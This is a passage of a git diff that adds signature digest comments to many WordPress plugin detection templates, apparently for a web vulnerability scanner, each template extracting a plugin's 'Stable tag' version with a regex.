@@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f811f1670bddf38287657735a5e5d624b1fe0ec6d887901bf0ddb517a3a3d36602206694ed11dcfe6689fdb6635aad010b6416ad370cce003548cdeac74b77da1f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..a1480b1a16 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009eec70acd0041e1ed5bbee7ddbd5bc06bd8551f82d2774f16e64e9e2cfbc522b022100b86e39d8d95874c203dca0e93654c694a06d96d0d16d6074d4732c4edbce5beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..400fc62e4f 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005cd1d69c8d4a826fb6ba709be25326c8bd8345fc1080f2244cd30b618c0d05702207bbf6d9c65d70c105f705b611f93b4bf6deeb50d0e138b6fa4a9bc47b0869095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..0417adc2b1 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe61939fcae363750231858af63da7576f3b4580db19e0e03855d012855f92bb02210080e6557c4beb8f319c9e042db15f6d485af2fc356fbdd032acaad064383d90ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..8d61601d9b 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db98dce1fe49b2ccca9ba0d6cd865cc85d5097755b32b8d2b498a1132c7ae79c022035fe96306325c725e42f6c089270fc12977c66a33413e76d6a6b9b2fbe0fbf7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..2f6228c797 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa2b762adb7fa2a34713803ef7dcd6b1a720c3803cbae4150d2e7d267e471435022100c0b6e88cfa026d69ee91642861087b9b7759b05977241c33a5bf84a66c7c8a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..00f0f6be88 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206aaee2c895a8e17073177cdd0b26f310b10a551ed2ee6e132607bc3131e4518f022100d5f5f6d38e69e340a645e91ca562dc71f6c420a76930ed5d763e775e7d5d06d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..75aa3fd835 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f4b779cc0e8896ba57b97bac055ac55c92b281b590d1e025b8b88ebdc55f44c02201acd12f34f34562850bb53a7164ac59206b64a38e5bc8c3c533409dbccb03b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..38718142e8 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db10df95e7bc579edbecdd52a7cdcbcb7124059c73a21c541d4c2799c05a773a022100db3c2413e39a29803fdafb7d501f16e89b08da4976e659896fa133dcbdad1ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..b966d24e5c 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ec5d4f5f1b5092ade9ee42ecdbe9e2c9032901da8423499f68b665e386bd73a022100b46efd28295204643627994dca3a3b6d7b5eb81b98ba686360d1fd1a1fa63664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..bd41207254 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068d83114420915c2590062e09870057c7d2be008216c23939acbbd78bd75aed9022100c7357bd5e236d4dde73b8e956063728137936c11a26ea39df8a75ab032f26c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..48c88ecba6 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bbe8fbd4043019718487281cfaa94d8c2b31f4a4366601a2db5bf702080c00d102202c8e39f794111a855e627023ee9ad927e8e2b2c704429519ac4cdf55dd070b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..7966c63f00 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d4f7d7b7b861b7d19b281069ad7e60c892df7bd6ef5f72d0075cfe6e3e8de6002200d1fab093fdcf405fb67bdb25d156abedc17ca58a509ec2743bc0ecba0de5038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..019fc9ba2e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204ca17db1a8c72f519eb60bd691903c1829c4a6ce067bfb6e34656a264396a6470220613b303f4dc1f732a92bc3e860dc2cbc914447f5d4e6ab450fdd1ae1128dd935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..385dc0e3a3 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015e18e6e5856594623a30b52f85d4d76ca9e6e3f7309af6cd483609779119d3b0221009d7a404428ebde6ee2639e331a558e3f052f1ee94c0aca65d23fc27bc4c4edd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..b9b2140b64 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee642d118d9fd491b2db9b1f9e1fa96fbb9e2e662f21dd8bf0973a031e2e2787022100b392a43e939428d8ae2f06d7003a4594ffcdee1b5331ecdcc169fc27a67fd203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..af68d8eaab 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f87d17473ddab07d8065d0f06c0ba1323cbade9171873afc2001ddc0fc476f102204ec754e776cb26d452b2d9daa84773c98ed2f540d7ed20e765420cbbd70b8aec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..3ea128f8df 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a549af6f657383377ad42b49b0f950bd27246de00e3d554c8a1a0a9c79d87009022100bc16e85f843368b977bef1a50b5d692acd3ce9b7c17aa2d249098dfb080d916c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..6f88d8ddbd 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b2a59e785cf91cb9916e189bb5e523e78cae49076cb22fa99e3487712374bc7022100c92c732ed70cbc8b5f44c53b139e630afb198f5a4dba17c5cbc8851ef6b3ccd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..c843d8cbef 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d2a5038abc743120eaa65a6366f9f877f2b6af44fac0e5c6d5ceb98ba1f982b0220131f376ea6583cdb0de8c3056f1134de9b0b593e50b90664eb6145213f4aa37b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..131e6e9942 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd56a92ed431994046cc2d11ed89d2cd9cdf38417fca999f0a567560834bc078022016afde734abe32f1783069456447902c8c4767f7386973f8ed0ab09459b75ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..e8d620283c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1e7d4198043b882b4e7c577d32da0fb493345806c5d9957fd07695dec8528e60220711ef4db0e2956d081c1f796666da8dca4b71c36e8dc9ba5c92737f778d74a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..f543cb7397 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035f028556ee6f7b7e529078d9171e8ba6009d6085c13c366f7ab060d88cf076d02200353ede180da3e76b2ee38692aed45a9957cf49d43cfc1107d8b29bd314e6dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..508215183a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa5d60f80074b43715d9ecd4bae5c15b7308d47e63aca95fa99d5e8a5d913ba9022100968074ade46d553cbea8686fb59fe279ffbac963cb0745a422a4d8c8cd2dc6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..3e2420eb40 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a494b3ef1950a71906f49dd9a0106a8fa58ce0bfa425208f6f4d18fa92ab2fb022046c7ecdb1d4e44fdb3f5425a050ae0d908eb10a7958372c57680f25d01372567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..8a9f78558f 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220439eda617685192c726d78e364bf5f0b819a6028f2a4f0de226d6f5868be9de602202505cab4b037227f25f78e9cc052ababfd330c4ef08dcf673f5596e1e0c37942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..c868a98e6f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d4d38f23ba4726ee958182452f121d0848e35db42379be4b6691ddf2c412e69022100c6bd5029d4e90ba8772019e4bfb029db5024d45f429102254cd7d513489f1a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..c83e6d4ae3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025f06203ec030a1bd8a211d8ead2ee7f648472e278cc388c043f32db875808570220520658e6dc78aed50c8f41364e0d999b103220a847d89a6178a93c39501b036b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..abdbf7fdac 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064632ae9fa1d6a3f4b8d064aa40987df7a9653da9db00e7b2a8a2df28ec78cbc02204a05757fedb770b17ebc59c334aeb367f5ce994a5cef013f8d9fbb2a952f4e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..f69d0abc60 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100974ddf174156fde780557d53ccaccda779a06e31a98ce430ba7497c75abbc13a022100fd4a66803170897489bc9e2a0d1178ef120157fbad170270be113681d95dae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..c188d3bb30 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082411521142d9b262f0963d763b64d1310803ce621504b1dd2b1528c69839fda02200ed2385e4a311bb3004cdb7eec21786979083a7beacbaae5422e9b7832e3c016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..afb4e1dbee 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7580268524d1b1ae3e2f4aa80a08ee36bdd80bef69d4e0c6587832dd5fab68d02210087b24ce18d1979149691e2e86bac0b2a900d8645a84950061d3bed46702c0c95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..4d7025a775 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f9fac27fea657e9b08143b024c41941eea9c52a5b46eb1ad1ab7e09c696c6eed022100bd921145015661af2ea1e9814e35ed49c9d761715b987801a9f487b348636678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..9f52986f6d 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d5cc207a0bc264fc999ac254e31ace96a550f1844796e796ab79c634907cf62022100e517e8c19510e406a822a1dd023cdde60d4b304f2a5d4f33cacb617031aa6f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..b1cca05f15 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d8c5eafa508acef94947834a57fda8f6aeaa567428d6d3fa68f2407f205e1b002207a445ea16877e147c7b71f49b02a72f2365a9ca3f3014f173fcf5962e33d5919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..3064ff6a7b 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100882c69cec85ed1abdb0621c9d438538ad64b36ca74e2fcbe53e347f2978738de022100a1a5601eb357c2d8e83b261d4ffe0b01e8f5863f5b4ae681bf78dff306b7ed39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..690c414c69 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a43ce3d5ac154c58211e1457343d53b0b6041ee05c86b789a8f7bc27b3cee9a02205444c6798ae466b50f98884a8af30b192e3abd9edf9dbc9d40d0dc723dc4bc40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..d3617ad7bb 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3329e47d57316cf522e73baf53113d8b43c657732e77a7c491ef3b0cdae04cd022100f2fbcb241f678fc6fce16c4cdfbb06650c4bf8c232bbd739e77c434b8b15d533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..482051e716 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220064c7558a15df9a54bf042f9d107dcae544f9238fa7ab70640221a14f612e54f022100a3548cb179e6d131f4cd10ed1725f4ccfe713e59f037f1c33d8b051d67ed9ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..79b8b9945b 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220400426f90016a6bad7788b05fae96aa786ab042b0b1d0740e22ff2873ba1d3c10220734a3ee55eb7f4b165f277482f4e929492d7b1518f32ee8e0915ddd60c47371b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..b52cf21e5e 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100800e0e918b89f4478c5da0db5a3c303de41c8b3597ff5c071bf93f2d6aefa25b02206e4a57146411d0476703c7e9824a7a6728ee19133db90137158b40cdd73b881d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..a74159d826 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043aa8ce92c705c1574e1f273c22dad65021567e03e3e85df870ae54668d25c8e02210089be38c3e1dc50b647305866055ee5add267a0e85e90b32db9cedc278980c92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..d86fa5d820 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025b9a7eec19ae74467af0fde0cdc7f8080300f1bf5d4516bfc0436de35543fee022100dc3be402196702268f86fed14d387d2aadc22bd185c190f427d5319ac2cd8cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..7dd4f4658c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071ed8ec9b4e8a324c6f6f723dca8e9f13136c4d564da33f3f97f0f2f3a2d30640220251969161cbfe4ec6f18f0245f79e45a9ad0315b4966fb67849bb24d4e6e4043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..cece8c3be3 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea77a6c4e32f7a4a00f8c05cb0e37702c0bd8fd68d47978fdd9f0b20f6fdf4bd02207068c7d84d79a943160c22f4a68d71c71c32496b57c66ea274a3fa5d01a27274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..84049a1631 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201067a9614491b6c7978a8845569286fac7c3252d48cca62e06dcba2d2c0fd1c90220039f926bebab24f66e00856ad5dbc7b048f3342237153822b3f278844fdd5c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..d42182a111 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e401f3fb1c0ba7f49e627a5c1ccdbcd97164932f22a5a711fbbc07e1fd6398f9022018ea1f0d28bd6400b4d3249d9b0bb2a5e4786cbafb6247d85dcf851294e4b8bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..6114bcf985 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d258e51678336ba3e557ceb2a701aaa0951e5ce9d79e1fab857754be1a27eeeb022039c92b0be20928eee3f1454c64fc7ebd5f660bc11507e0d39c7ab1b9bbee842f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 